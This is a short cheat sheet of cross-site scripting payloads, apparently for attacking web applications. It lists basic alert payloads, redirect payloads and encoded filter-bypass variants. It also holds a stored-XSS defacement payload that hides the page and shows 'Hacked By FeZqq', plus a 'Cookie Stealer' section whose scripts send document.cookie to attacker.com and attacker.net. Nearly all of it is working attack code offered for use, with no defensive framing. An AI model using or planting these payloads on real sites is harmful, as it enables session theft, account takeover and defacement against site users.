Destroy Everything For Stored XSS (Use Carefully)
-------------------------------------------------
<style>html::before {content: "Hacked By FeZqq";} body {display: none;}</style>



Basic Payloads For First Step
-------------------------------------------------
<script>alert(1)</script>
<img src=validimage.png onload=alert(1)>
<img src/onerror=prompt(8)>
<input onclick="alert(1)" style=display:block>test</input>
<a onmouseover="alert(1)" style=display:block>test</a>
<a href="javascript:alert(1)">Click</a>




Redirect Payloads
-------------------------------------------------
<script>window.location='https://google.com'</script>
<script>window.location=&quot;https://google.com&quot;</script>
<script>location='https://google.com'</script>
<a href="#" onclick="location='https://google.com'">Click me</a>
<img src=x onerror="location='https://google.com'">

Other
------------
"><svg/onload​=setTimeout`${'ale'+'rt'}(1)`>
javascript:alert(1)
\"-alert(1)}//
\';alert(1)//
<img src/onerror=prompt("test")>
<img+src%3Dx+onerror%3D"%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">

onclick event
-------------
http://foo?&apos;-alert(1)-&apos;

Cookie Stealer
---------------
<script>
fetch('https://attacker.com', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

<script>fetch(`http://attacker.net/cookie?cookie=${document.cookie}`,{method: "GET",mode: "no-cors"});</script>

<script>document.location='//attacker.net/'+document.cookie</script>

OnXSS=<Img/Src/OnError=(alert)(1)>

